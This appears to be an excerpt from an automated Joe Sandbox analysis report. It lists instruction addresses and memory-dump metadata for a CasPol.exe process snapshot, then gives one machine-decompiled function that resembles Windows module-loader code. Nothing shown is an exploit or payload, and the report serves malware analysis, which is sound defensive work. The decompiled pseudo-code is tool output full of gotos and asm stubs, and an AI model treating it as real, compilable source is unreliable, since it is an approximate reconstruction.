                                                                0x01621010
                                                                0x0162100a
                                                                0x01620e3f
                                                                0x01620e58
                                                                0x01620e5d
                                                                0x01621000
                                                                0x01620e63
                                                                0x01620e63
                                                                0x01620e63
                                                                0x01620e67
                                                                0x01620e69
                                                                0x01620e69
                                                                0x01620e6d
                                                                0x01620e70
                                                                0x01620e74
                                                                0x01620e76
                                                                0x01620e76
                                                                0x01620e7a
                                                                0x01620e7c
                                                                0x01620e7c
                                                                0x01620e83
                                                                0x01620e86
                                                                0x01620e87
                                                                0x01620e89
                                                                0x01620e8b
                                                                0x01620e91
                                                                0x01620e00
                                                                0x01620e03
                                                                0x01620e03
                                                                0x01620e07
                                                                0x01620e0f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620e0f
                                                                0x01620e97
                                                                0x01620e9c
                                                                0x0162113e
                                                                0x01621141
                                                                0x01621143
                                                                0x01620eb1
                                                                0x01620eb1
                                                                0x01620eb4
                                                                0x01620eb6
                                                                0x01621110
                                                                0x01621112
                                                                0x0167ea25
                                                                0x0167ea25
                                                                0x01620ec3
                                                                0x01620ec3
                                                                0x01620ecb
                                                                0x016210fe
                                                                0x01620ed1
                                                                0x01620ed1
                                                                0x01620ed1
                                                                0x01620ed3
                                                                0x01620edb
                                                                0x0167ea2d
                                                                0x0167ea2f
                                                                0x0167ea31
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea37
                                                                0x0167ea37
                                                                0x0167ea3a
                                                                0x0167ea3e
                                                                0x0167ea47
                                                                0x0167ea4a
                                                                0x0167ea4c
                                                                0x0167ea4d
                                                                0x0167ea4d
                                                                0x0167ea4e
                                                                0x0167ea4e
                                                                0x0167ea51
                                                                0x0167ea52
                                                                0x0167ea52
                                                                0x00000000
                                                                0x01620ee1
                                                                0x01620ee1
                                                                0x01620ee1
                                                                0x01620ee3
                                                                0x01620ee3
                                                                0x01620ee6
                                                                0x01620eec
                                                                0x0167ea5b
                                                                0x0167ea5d
                                                                0x01620ef6
                                                                0x01620ef8
                                                                0x0167ea6f
                                                                0x0167ea6f
                                                                0x01620efe
                                                                0x01620efe
                                                                0x01620f03
                                                                0x0167ea7b
                                                                0x0167ea7d
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea83
                                                                0x0167ea85
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea8b
                                                                0x0167ea91
                                                                0x00000000
                                                                0x00000000
                                                                0x0167ea97
                                                                0x0167ea9a
                                                                0x0167eaa0
                                                                0x0167eaa2
                                                                0x0167eaa2
                                                                0x0167eaae
                                                                0x0167eab3
                                                                0x0167eab6
                                                                0x0167eabf
                                                                0x0167eaca
                                                                0x0167eacd
                                                                0x0167ead1
                                                                0x0167ead1
                                                                0x0167eab8
                                                                0x0167eab8
                                                                0x0167eab8
                                                                0x0167ead2
                                                                0x0167ead9
                                                                0x01620f0e
                                                                0x01620f15
                                                                0x01620f17
                                                                0x01620f17
                                                                0x01620f1e
                                                                0x01620f23
                                                                0x0167eae1
                                                                0x0167eae1
                                                                0x01620f38
                                                                0x01620f3a
                                                                0x01620f3a
                                                                0x01620f49
                                                                0x01621108
                                                                0x01621108
                                                                0x01620f5b
                                                                0x016210c7
                                                                0x016210ca
                                                                0x016210cc
                                                                0x00000000
                                                                0x00000000
                                                                0x016210dc
                                                                0x016210de
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620f61
                                                                0x01620f61
                                                                0x01620f61
                                                                0x01620f67
                                                                0x01620f6b
                                                                0x0162111d
                                                                0x0162111d
                                                                0x01620f75
                                                                0x01620f77
                                                                0x01620f77
                                                                0x01620f85
                                                                0x01620f8b
                                                                0x016210b9
                                                                0x016210bc
                                                                0x0167eae9
                                                                0x0167eae9
                                                                0x01620f91
                                                                0x01620f91
                                                                0x01620f91
                                                                0x01620f96
                                                                0x01620f98
                                                                0x01620f9a
                                                                0x01620f9a
                                                                0x01620fa6
                                                                0x0162107c
                                                                0x0162107f
                                                                0x0162108d
                                                                0x00000000
                                                                0x0162108d
                                                                0x01621081
                                                                0x01621087
                                                                0x0167eaf4
                                                                0x0167eafa
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0167eb00
                                                                0x00000000
                                                                0x01620fac
                                                                0x01620fac
                                                                0x00000000
                                                                0x01620fac
                                                                0x01620fa6
                                                                0x01620f5b
                                                                0x01620f09
                                                                0x01620f09
                                                                0x00000000
                                                                0x01620f09
                                                                0x0167ea63
                                                                0x00000000
                                                                0x0167ea63
                                                                0x01620ef4
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620ef4
                                                                0x01620ebc
                                                                0x01620ebc
                                                                0x00000000
                                                                0x01620ebc
                                                                0x01620eb6
                                                                0x01621149
                                                                0x0162114c
                                                                0x0162114d
                                                                0x00000000
                                                                0x0162114d
                                                                0x01620ea4
                                                                0x01620ea7
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620fb7
                                                                0x01620fb7
                                                                0x01620fbc
                                                                0x01620fc9
                                                                0x01620fc9
                                                                0x01620fce
                                                                0x01621020
                                                                0x01621025
                                                                0x01621094
                                                                0x01621094
                                                                0x01621099
                                                                0x0167ea04
                                                                0x0167ea04
                                                                0x0167ea09
                                                                0x0167ea1c
                                                                0x0167ea0b
                                                                0x0167ea0b
                                                                0x0167ea0e
                                                                0x0167ea14
                                                                0x0167ea14
                                                                0x0167ea0e
                                                                0x0167ea09
                                                                0x01621027
                                                                0x01621027
                                                                0x01621155
                                                                0x0162102d
                                                                0x0162102d
                                                                0x0162102d
                                                                0x01621032
                                                                0x0167e9fc
                                                                0x0167e9fc
                                                                0x01621032
                                                                0x01621027
                                                                0x00000000
                                                                0x01621025
                                                                0x01620fd0
                                                                0x0167e9f4
                                                                0x00000000
                                                                0x0167e9f4
                                                                0x01620fd6
                                                                0x01620fd9
                                                                0x01621059
                                                                0x01621059
                                                                0x0162105e
                                                                0x0167e9ec
                                                                0x01621064
                                                                0x01621064
                                                                0x01621064
                                                                0x01621069
                                                                0x016210ac
                                                                0x0162106b
                                                                0x0162106b
                                                                0x0162106e
                                                                0x01621074
                                                                0x01621074
                                                                0x0162106e
                                                                0x01621069
                                                                0x00000000
                                                                0x0162105e
                                                                0x01620fdb
                                                                0x016210a4
                                                                0x00000000
                                                                0x016210a4
                                                                0x01620fe1
                                                                0x01620fe4
                                                                0x00000000
                                                                0x00000000
                                                                0x01620fea
                                                                0x01620ff1
                                                                0x00000000
                                                                0x01620ff8
                                                                0x00000000
                                                                0x00000000
                                                                0x0167e9e4
                                                                0x00000000
                                                                0x00000000
                                                                0x01621018
                                                                0x00000000
                                                                0x00000000
                                                                0x01621051
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620ff1
                                                                0x01620fbe
                                                                0x01620fc3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01620fc3
                                                                0x01620df3
                                                                0x0167e9d5
                                                                0x0167e9d7
                                                                0x01621128
                                                                0x01621128
                                                                0x0162112b
                                                                0x0162112d
                                                                0x01621133
                                                                0x01621133
                                                                0x00000000
                                                                0x0162112d
                                                                0x00000000
                                                                0x0167e9d7
                                                                0x01620dc2
                                                                0x016210f6
                                                                0x01620dd4
                                                                0x01620dd7
                                                                0x01620dda
                                                                0x01620de8
                                                                0x01620de9
                                                                0x01620de9
                                                                0x01620dda
                                                                0x00000000
                                                                0x01620dc2
                                                                0x01620dac
                                                                0x01620dae
                                                                0x01620db3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed672bea518987d309454d04cc339cdc3f7c6f053da6ad8e806ce6cad1207640
                                                                • Instruction ID: 16741bb5e3683242d2076b63dd420d1b2fc66a51007bed9ab927ee4ccea43af9
                                                                • Opcode Fuzzy Hash: ed672bea518987d309454d04cc339cdc3f7c6f053da6ad8e806ce6cad1207640
                                                                • Instruction Fuzzy Hash: 9AD1B431E04A698BEB28CF9CCC957BDBBB1FB45300F148029E946A7385D7798986CF41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 87%
                                                                			E0163D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x171d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01636600(0x17152d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1717b9c; // 0x0
							_t281 = L01644620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0166F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1717b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x1717b8c; // 0x11c2a78
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01642280(_t200, 0x17184d8);
									_t277 =  *0x17185f4; // 0x11c2f68
									_t351 =  *0x17185f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x11c2f00
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0163FFB0(_t287, _t353, 0x17184d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0167CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01636600(0x17152d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01637926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x171b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E016AE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1718472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x171b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x171b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01642280(_t250, 0x17184d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01663898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0163FFB0(_t293, _t353, 0x17184d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E016637F5(_t353, 0);
																}
																E01660413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01659B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E016502D6(_t174);
																}
																L016477F0( *0x1717b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0165C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0163EC7F(_t353);
										L016519B8(_t287, 0, _t353, 0);
										_t200 = E0162F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x171b2f8 |  *0x171b2fc) == 0 || ( *0x171b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0166B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x171b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E016D6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E016D6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0163E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0163EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01669730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0163E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01638F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01663C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                0x0163d5f2
                                                                0x0163d5f5
                                                                0x0163d5f5
                                                                0x0163d5fd
                                                                0x0163d600
                                                                0x0163d60a
                                                                0x0163d60d
                                                                0x0163d617
                                                                0x0163d61d
                                                                0x0163d627
                                                                0x0163d62e
                                                                0x0163d911
                                                                0x0163d913
                                                                0x00000000
                                                                0x0163d919
                                                                0x0163d919
                                                                0x0163d919
                                                                0x0163d634
                                                                0x0163d634
                                                                0x0163d634
                                                                0x0163d634
                                                                0x0163d640
                                                                0x0163d8bf
                                                                0x00000000
                                                                0x0163d646
                                                                0x0163d646
                                                                0x0163d64d
                                                                0x0163d652
                                                                0x0168b2fc
                                                                0x0168b2fc
                                                                0x0168b302
                                                                0x0168b33b
                                                                0x0168b341
                                                                0x00000000
                                                                0x0168b304
                                                                0x0168b304
                                                                0x0168b319
                                                                0x0168b31e
                                                                0x0168b324
                                                                0x0168b326
                                                                0x0168b332
                                                                0x0168b347
                                                                0x0168b34c
                                                                0x0168b351
                                                                0x0168b35a
                                                                0x00000000
                                                                0x0168b328
                                                                0x0168b328
                                                                0x00000000
                                                                0x0168b328
                                                                0x0168b326
                                                                0x0163d658
                                                                0x0163d658
                                                                0x0163d65b
                                                                0x0163d665
                                                                0x00000000
                                                                0x0163d66b
                                                                0x0163d66b
                                                                0x0163d66b
                                                                0x0163d66b
                                                                0x0163d66d
                                                                0x0163d672
                                                                0x0163d67a
                                                                0x00000000
                                                                0x00000000
                                                                0x0163d680
                                                                0x0163d686
                                                                0x0163d8ce
                                                                0x0163d8d4
                                                                0x0163d8dd
                                                                0x0163d8e0
                                                                0x0163d68c
                                                                0x0163d691
                                                                0x0163d69d
                                                                0x0163d6a2
                                                                0x0163d6a7
                                                                0x0163d6b0
                                                                0x0163d6b5
                                                                0x0163d6e0
                                                                0x0163d6b7
                                                                0x0163d6b7
                                                                0x0163d6b9
                                                                0x0163d6b9
                                                                0x0163d6bb
                                                                0x0163d6bd
                                                                0x0163d6ce
                                                                0x0163d6d0
                                                                0x0163d6d2
                                                                0x0168b363
                                                                0x0168b365
                                                                0x00000000
                                                                0x0168b36b
                                                                0x00000000
                                                                0x0168b36b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163d6bf
                                                                0x0163d6bf
                                                                0x0163d6e5
                                                                0x0163d6e7
                                                                0x0163d6e9
                                                                0x0163d6ec
                                                                0x0163d6ec
                                                                0x0163d6ef
                                                                0x0163d6f5
                                                                0x0163d6f9
                                                                0x0163d6fb
                                                                0x0163d6fd
                                                                0x0163d701
                                                                0x0163d703
                                                                0x0163d70a
                                                                0x0163d70a
                                                                0x0163d701
                                                                0x0163d710
                                                                0x0163d710
                                                                0x0163d6c1
                                                                0x0163d6c1
                                                                0x0163d6c6
                                                                0x0168b36d
                                                                0x0168b36f
                                                                0x00000000
                                                                0x0168b375
                                                                0x0168b375
                                                                0x0168b375
                                                                0x00000000
                                                                0x0168b375
                                                                0x00000000
                                                                0x0163d6cc
                                                                0x0163d6d8
                                                                0x0163d6d8
                                                                0x0163d6d8
                                                                0x00000000
                                                                0x0163d6c6
                                                                0x0163d6bf
                                                                0x00000000
                                                                0x0163d6da
                                                                0x0163d6da
                                                                0x0163d716
                                                                0x0163d71b
                                                                0x0163d720
                                                                0x0163d726
                                                                0x0163d726
                                                                0x0163d72d
                                                                0x00000000
                                                                0x0163d733
                                                                0x0163d739
                                                                0x0163d742
                                                                0x0163d750
                                                                0x0163d758
                                                                0x0163d764
                                                                0x0163d776
                                                                0x0163d77a
                                                                0x0163d783
                                                                0x0163d928
                                                                0x0163d92c
                                                                0x0163d93d
                                                                0x0163d944
                                                                0x0163d94f
                                                                0x0163d954
                                                                0x0163d956
                                                                0x0163d95f
                                                                0x0163d961
                                                                0x0163d973
                                                                0x0163d973
                                                                0x0163d956
                                                                0x0163d944
                                                                0x0163d92c
                                                                0x0163d78b
                                                                0x0168b394
                                                                0x0163d791
                                                                0x0163d798
                                                                0x0168b3a3
                                                                0x0168b3bb
                                                                0x0168b3bb
                                                                0x0163d7a5
                                                                0x0163d866
                                                                0x0163d870
                                                                0x0163d892
                                                                0x0163d898
                                                                0x0163d89e
                                                                0x0163d8a0
                                                                0x0163d8a6
                                                                0x0163d8ac
                                                                0x0163d8ae
                                                                0x0163d8b4
                                                                0x0163d8b4
                                                                0x0163d8ae
                                                                0x0163d7a5
                                                                0x0163d78b
                                                                0x0163d7b1
                                                                0x0168b3c5
                                                                0x0168b3c5
                                                                0x0163d7c3
                                                                0x0163d7ca
                                                                0x0163d7e5
                                                                0x0163d7eb
                                                                0x0163d8eb
                                                                0x0163d8ed
                                                                0x00000000
                                                                0x0163d8f3
                                                                0x0163d8f3
                                                                0x0163d8f3
                                                                0x00000000
                                                                0x0163d8ed
                                                                0x0163d7cc
